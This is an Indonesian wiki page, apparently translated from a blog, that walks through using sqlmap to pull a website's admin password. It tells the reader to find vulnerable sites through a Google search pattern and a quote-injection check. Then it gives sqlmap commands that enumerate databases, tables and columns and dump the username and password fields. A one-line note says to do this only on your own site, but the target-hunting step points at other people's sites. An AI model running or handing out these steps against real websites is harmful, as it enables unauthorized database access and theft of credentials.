Sqlmap: memperoleh password database sql

From OnnoWiki
Revision as of 07:34, 14 November 2014 by Onnowpurbo (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/


Berikut adalah cara memperoleh password, termasuk password admin sebuah situs web. Lakukan ini ke web anda sendiri, agar tidak melanggar hukum.


Step 1 – Google search php?=id1

Cari di Google, keyword

php?=id1

Jika sudah dapat URL-nya dari Google, Tambahkan sebuah quote di akhir URL-nya sehingga menjadi

http://alamatweb.com/index.php?=id1′

Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.

Step 2 – Kali SQLMAP – dapatkan website database

sqlmap –u http:\\website.com/page.php?id=1 --dbs

Ambil semua database yang tersedia di web.

Step 3 – Cari tabel LOGIN

sqlmap –u http:\\website.com/page.php?id=1 -D www --tables

Cari target seperti, tabel login, username atau password.

Step 4 – Dapatkan semua login data

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns

Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.

Step 5 – Dapatkan Username (& Admin)

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump

Cari “admin”


Step 6 – Dapatkan Password (dari Admin)

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump

That’s it.


Referensi